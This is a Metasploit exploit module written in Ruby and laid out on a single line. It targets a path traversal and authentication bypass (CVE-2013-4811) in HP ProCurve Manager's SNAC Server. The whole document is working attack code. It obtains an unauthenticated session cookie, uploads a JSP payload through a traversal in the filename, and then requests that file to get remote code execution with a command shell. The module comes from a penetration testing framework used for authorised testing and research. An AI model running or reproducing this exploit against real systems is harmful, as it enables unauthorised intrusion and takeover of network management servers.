## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload', 'Description' => %q{ This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary files, just having into account binary writes aren't allowed. Additionally, authentication can be bypassed in order to upload the file. This module has been tested successfully on the SNAC server installed with HP ProCurve Manager 4.0. }, 'Author' => [ 'rgod ', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-4811' ], [ 'OSVDB', '97154' ], [ 'BID', '62349' ], [ 'ZDI', '13-226' ] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_JAVA, 'DefaultOptions' => { 'SHELL' => 'cmd.exe', 'SSL' => true }, 'Targets' => [ [ 'HP ProCurve Manager 4.0 SNAC Server', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2013-09-09', 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options( [ Opt::RPORT(443) ] ) end def check session = get_session if session.nil? return Exploit::CheckCode::Safe end res = send_request_cgi({ 'uri' => "/RegWeb/RegWeb/GetDomainControllerServlet", 'cookie' => session }) if res and res.code == 200 and res.body =~ /domainName/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def get_session res = send_request_cgi({ 'uri' => "/RegWeb/html/snac/index.html" }) session = nil if res and res.code == 200 session = res.get_cookies end if session and not session.empty? return session end return nil end def exploit_upload(session) jsp_name = "#{rand_text_alphanumeric(8 + rand(8))}.jsp" post_message = Rex::MIME::Message.new post_message.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"adCert\"; filename=\"\\../#{jsp_name}\"") post_message.add_part("{}", nil, nil, "form-data; name=\"ad_data\"") post_message.add_part("add", nil, nil, "form-data; name=\"ad_action\"") data = post_message.to_s res = send_request_cgi( { 'uri' => "/RegWeb/RegWeb/UpdateDomainControllerServlet", 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_message.bound}", 'cookie' => session, 'data' => data, } ) if res and res.code == 200 and res.body =~ /success:false/ return jsp_name end return nil end def exploit print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end end